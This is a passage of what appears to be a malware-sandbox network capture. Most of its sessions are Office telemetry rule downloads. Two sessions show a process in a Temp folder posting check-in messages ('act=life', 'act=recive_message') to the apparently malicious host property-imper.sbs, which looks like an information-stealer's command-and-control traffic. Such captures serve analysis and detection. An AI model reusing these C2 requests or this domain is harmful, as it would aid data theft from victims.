2024-11-22 19:36:31 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:31 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6CF78C8" x-ms-request-id: 4e89b2fa-a01e-006f-563a-3c13cd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193631Z-178bfbc474bq2pr7hC1NYCkfgg00000003gg00000000h9rg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:31 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.2.4	49840	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:31 UTC	192	OUT	GET /rules/rule120676v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:32 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:31 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B984BF177" x-ms-request-id: dd6dc7e9-901e-008f-3238-3c67a6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193631Z-15b8b599d88vp97chC1TEB5pzw00000001rg00000000qrx2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:32 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
81	192.168.2.4	49843	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:31 UTC	192	OUT	GET /rules/rule120678v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:32 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:32 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA642BF4" x-ms-request-id: 26217b89-b01e-001e-808c-3a0214000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193632Z-178bfbc474bv587zhC1NYCny5w00000003a0000000009sse x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:32 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
82	192.168.2.4	49841	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:31 UTC	192	OUT	GET /rules/rule120677v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:32 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:32 GMT Content-Type: text/xml Content-Length: 405 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT ETag: "0x8DC582B942B6AFF" x-ms-request-id: 964846c7-701e-001e-36c3-3bf5e6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193632Z-174c587ffdfcj798hC1TEB9bq4000000021g00000000bqmd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:32 UTC	405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.4	49844	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:32 UTC	192	OUT	GET /rules/rule120679v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:32 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:32 GMT Content-Type: text/xml Content-Length: 174 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91D80E15" x-ms-request-id: 5556881b-d01e-008e-6531-3c387a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193632Z-178bfbc474bbbqrhhC1NYCvw7400000003m00000000097te x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:32 UTC	174	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.4	49845	172.67.162.84	443	6588	C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:32 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: property-imper.sbs
2024-11-22 19:36:32 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-11-22 19:36:33 UTC	1015	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8khg0lnieou82a8u28l87d8ge3; expires=Tue, 18-Mar-2025 13:23:11 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hLT6Q39J3hWQFhyUdZI2q4WW3aznOo4ut3gcnubJsBzF0vEvtCetKNawnf0fpUfB74K6Mf4bCt5KaBV1qQbDsQI%2FPlGUUuwL7M5tnw2wLl%2BoU4Y8KxdVl%2FPSZVFEBbJv7%2Fwcs6M%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e6b5e74fdee435c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1673&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=909&delivery_rate=1664766&cwnd=248&unsent_bytes=0&cid=eb059cf47a339fbb&ts=742&x=0"
2024-11-22 19:36:33 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-11-22 19:36:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
85	192.168.2.4	49847	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:33 UTC	192	OUT	GET /rules/rule120680v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:34 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:34 GMT Content-Type: text/xml Content-Length: 1952 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B956B0F3D" x-ms-request-id: 6b04d5e8-e01e-000c-65ad-3b8e36000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193634Z-174c587ffdf6b487hC1TEBydsn00000001qg00000000tfem x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:34 UTC	1952	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
86	192.168.2.4	49848	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:33 UTC	192	OUT	GET /rules/rule120681v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:34 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:34 GMT Content-Type: text/xml Content-Length: 958 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT ETag: "0x8DC582BA0A31B3B" x-ms-request-id: 28a3992e-001e-0028-777f-3bc49f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193634Z-174c587ffdf89smkhC1TEB697s000000020g0000000057pm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:34 UTC	958	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
87	192.168.2.4	49849	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:34 UTC	192	OUT	GET /rules/rule120682v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:34 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:34 GMT Content-Type: text/xml Content-Length: 501 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT ETag: "0x8DC582BACFDAACD" x-ms-request-id: 6a1e2df9-c01e-008d-338c-3a2eec000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193634Z-174c587ffdf59vqchC1TEByk680000000230000000004n8y x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:34 UTC	501	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.4	49850	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:34 UTC	193	OUT	GET /rules/rule120602v10s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:34 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:34 GMT Content-Type: text/xml Content-Length: 2592 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5B890DB" x-ms-request-id: 85babd8c-f01e-003f-4e8c-3ad19d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193634Z-174c587ffdfldtt2hC1TEBwv9c00000001r000000000c7xp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:34 UTC	2592	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=

Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.2.4	49851	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:34 UTC	192	OUT	GET /rules/rule120601v3s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:34 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:34 GMT Content-Type: text/xml Content-Length: 3342 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT ETag: "0x8DC582B927E47E9" x-ms-request-id: abaf503b-901e-0064-2b47-3ce8a6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193634Z-178bfbc474bh5zbqhC1NYCkdug000000037g00000000uws4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:34 UTC	3342	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.4	49852	172.67.162.84	443	6588	C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:34 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 53 Host: property-imper.sbs
2024-11-22 19:36:34 UTC	53	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-11-22 19:36:35 UTC	1015	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tqe7i9j2o3qvfkcsk9gunq8soq; expires=Tue, 18-Mar-2025 13:23:14 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kyk0MU77iOzwwKn4fTFrGlskwPHHGO7k1iRCED6%2BtmN%2BFgdedIWt2Le4VFci9VkJ2Kt4kvDzNGTWB4mfK8x42%2B6rWOGId5B0lUt25xTrYixKVVo%2FwUJpBIrSyOVvyaMgVQ9329w%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e6b5e81fa1c4216-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1964&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=955&delivery_rate=1645070&cwnd=249&unsent_bytes=0&cid=a76e901e258794bf&ts=811&x=0"
2024-11-22 19:36:35 UTC	354	IN	Data Raw: 34 34 36 63 0d 0a 74 4d 59 4a 71 30 32 43 5a 49 42 51 4c 59 72 75 6f 43 69 41 6f 33 46 58 5a 6b 36 36 41 51 55 53 37 4e 37 32 56 6b 55 68 4f 4d 2f 50 35 48 2b 4a 64 37 5a 49 6f 69 4e 49 71 4e 54 55 57 76 58 47 58 58 55 48 4b 70 67 37 59 33 4f 41 72 5a 4e 36 5a 31 64 56 37 59 36 67 61 4d 63 2b 35 30 69 69 4e 56 57 6f 31 50 74 54 6f 73 59 66 64 56 78 73 33 32 74 6e 63 34 43 38 6c 7a 30 71 55 56 53 73 33 4b 70 75 77 79 6a 68 41 4f 45 38 51 4f 2b 4c 78 55 6e 71 7a 52 67 36 44 69 4f 59 4c 53 64 33 6c 76 7a 4d 64 41 68 45 54 4b 37 35 70 33 72 41 62 2f 39 49 2b 33 4a 49 35 4d 79 61 43 75 48 47 45 7a 73 41 4b 74 46 70 62 58 71 49 76 5a 49 38 4e 55 68 65 70 39 79 6b 62 63 49 69 36 42 54 73 4e 6b 66 6b 6a 63 39 4a 6f 6f 39 54 4d 68 78 73 67 43 4d 30 51 